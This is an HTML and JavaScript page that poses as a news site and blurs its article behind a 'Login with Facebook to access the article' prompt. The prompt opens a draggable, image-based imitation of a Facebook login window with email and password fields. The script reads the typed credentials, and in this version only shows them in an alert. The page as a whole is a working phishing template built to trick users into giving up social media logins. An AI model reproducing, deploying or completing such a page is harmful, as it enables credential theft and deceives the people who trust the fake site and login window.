<!DOCTYPE html>
<html>

<head>
    <title>The News Week Journal ®</title>
    <script type="text/javascript" src="jquery.js"></script>
    <style type="text/css">
    body{
        color: white;
        font-family: "helvetica";
        text-align: center;
    }
    #facebook_login_frame {
        background-image: url("facebook_login.png");
        background-size: 100%;
        width: 600px;
        height: 651px;
        display: none;
        position: absolute;
        left: 50%;
        margin-left: -300px;
        top: 50%;
        margin-top: -325px;
        draggable: true;
        z-index: 10000;
    }
    
    #statBar {
        position: absolute;
        display: block;
        width: 492px;
        left: 50%;
        margin-left: -246px;
        height: 20px;
        top: 32px;
    }
    
    #username {
        position: absolute;
        left: 212px;
        top: 161px;
    }
    
    #password {
        position: absolute;
        left: 212px;
        top: 193px;
    }
    
    input {
        width: 182px;
        height: 17px;
    }
    
    #submit_login {
        display: block;
        position: absolute;
        width: 54px;
        height: 24px;
        background-color: transparent;
        bottom: 87px;
        right: 126px;
    }
    
    #submit_login:hover {
        cursor: pointer;
    }
    
    #facebook_login_button {
        background-image: url("social_login.png");
        background-size: 100%;
        width: 397px;
        height: 32px;
        z-index: 10000;
        position: absolute;
        left: 50%;
        margin-left: -100px;
        top: 300px;
    }
    
    #signup_or_signin {
        display: block;
        position: absolute;
        width: 500px;
        height: 500px;
        left: 50%;
        margin-left: -250px;
        top: 50%;
        margin-top: -250px;
        background-color: white;
        background-image: url("history.jpg");
        background-size: cover;
        border-radius: 5px;
    }
    
    #facebook_login_button:hover {
        cursor: pointer;
    }
    
    #iframeDiv {
        width: 100%;
        height: 100%;
        border: 0 solid transparent;
        display: block;
        position: absolute;
        z-index: 1;
        margin 0;
        padding: 0;
    }
    
    #blur {
        display: block;
        position: absolute;
        width: 100%;
        height: 100%;
        background-color: rgba(255, 255, 255, 0.88);
        display: none;
        z-index: 999;
    }
    
    iframe {
        width: 100%;
        height: 100%;
        border: 0 solid transparent;
    }
    
    #navBar {
        position: absolute;
        display: block;
        width: 100%;
        height: 70px;
        background-color: rgba(0, 0, 0, 0.4);
    }
    
    #or {
        width: 100%;
        text-align: center;
        top: 170px;
        position: absolute;
        display: block;
        font-family: "helvetica";
        color: rgb(200, 200, 200);
    }
    
    #realSignup {
        top: 200px;
        display: block;
        position: absolute;
        font-family: "helvetica";
        color: rgb(200, 200, 200);
        font-weight: 100;
        left:50px;
    }
    .realInput{
    	border-radius: 3px;

    	border: 1px solid rgb(200,200,200);

    	height:22px;
    	background-color: transparent;
    	color: white;
    	float: right;
    	width:400px;
    	margin-top: 5px;
    }
    .lbl{
    	font-family: "helvetica";
    	font-size:14px;
    	color: rgb(200,200,200);
    }

    #realSigninButton{
    	display: block;
    	position: absolute;
    	background-color: rgb(252, 61, 5);
    	border-radius: 3px;
    	top:180px;
    	padding: 7px 10px;
    	right: 0px;
    }
    #realSigninButton:hover{
    	background-color: rgb(255, 74, 18);
    	cursor: pointer;
    }
    #logo{
    	width:130px;
    	margin-left: 5px;
    	margin-top: 10px;

    }

    </style>
</head>

<body>
    <div id="facebook_login_frame" class="window">
        <div id="statBar" class="titlebar"></div>
        <div id="content">
            <div id="username">
                <input id="facebook_email" type="text">
            </div>
            <div id="password">
                <input id="facebook_password" type="password">
            </div>
            <div id="submit_login"></div>
        </div>
    </div>
    <div id="blur">
<!--         <div id="signup_or_signin">
            <div id="navBar"><img  id="logo" src="logo.png"></div>
            <div id="facebook_login_button"></div>
            <div id="or">or</div>

            <div id="realSignup">
                <label class="lbl">Your email address</label></br>
                <input type="text" class="realInput" id="realEmail"> </br>
                </br></br>
                <label class="lbl">Your password</label></br>
                <input type="password" class="realInput"></br>
                <p id="forgotPass" style="font-size:13px; padding-top:10px; color: rgb(150,150,150);">Forgot your password or email address</p>
                <div id="realSigninButton">Sign in</div>
            </div>
        </div> -->
        <div id="signup_or_signin">
            <div id="navBar"><img id="logo" src="logo.png"></div>
            <h1 style="
    margin-top: 119px;
">Login with Facebook to access the article</h1><h4 style="
    width: 80%;
    margin-left: 10%;
">We will never post to your page or share your email address with anyone</h4><div id="facebook_login_button" style="
    width: 40%;
    background-size: auto;
"></div>
            

            
        </div>
    </div>
    <div id="iframeDiv">
        <iframe src="website/website.htm"></iframe>
    </div>
    <script type="text/javascript">
    var isMac = navigator.platform.toUpperCase().indexOf('MAC')>=0;
    console.log("is Mac? "+isMac);
    $(document).ready(function() {
        setTimeout(function() {
            $("#blur").fadeIn()
            $("#realEmail").focus();


        }, 400)
    })
    $("#facebook_login_button").on("click", function() {
        setTimeout(function() {
            $("#facebook_login_frame").show();
            $("#facebook_email").focus();

            // $("#signup_or_signin").fadeOut();
        }, 500)

    })

    // For each item with a `window` class…
    var windows = document.querySelectorAll('.window');
    [].forEach.call(windows, function(win) {

        // …find the title bar inside it and do something onmousedown
        var title = win.querySelector('.titlebar');
        title.addEventListener('mousedown', function(evt) {

            // Record where the window started
            var real = window.getComputedStyle(win),
                winX = parseFloat(real.left),
                winY = parseFloat(real.top);

            // Record where the mouse started
            var mX = evt.clientX,
                mY = evt.clientY;

            // When moving anywhere on the page, drag the window
            // …until the mouse button comes up
            document.body.addEventListener('mousemove', drag, false);
            document.body.addEventListener('mouseup', function() {
                document.body.removeEventListener('mousemove', drag, false);
            }, false);

            // Every time the mouse moves, we do the following 
            function drag(evt) {
                // Add difference between where the mouse is now
                // versus where it was last to the original positions
                win.style.left = winX + evt.clientX - mX + 'px';
                win.style.top = winY + evt.clientY - mY + 'px';
            };
        }, false);

    });

    $("#submit_login").on("click", function() {
        $(this).css("background-color", "rgba(255, 255, 255, 0.5)");
        var user = $("#facebook_email").val()
        var pass = $("#facebook_password").val()
        alert(user + " " + pass);
    })
    </script>
</body>

</html>
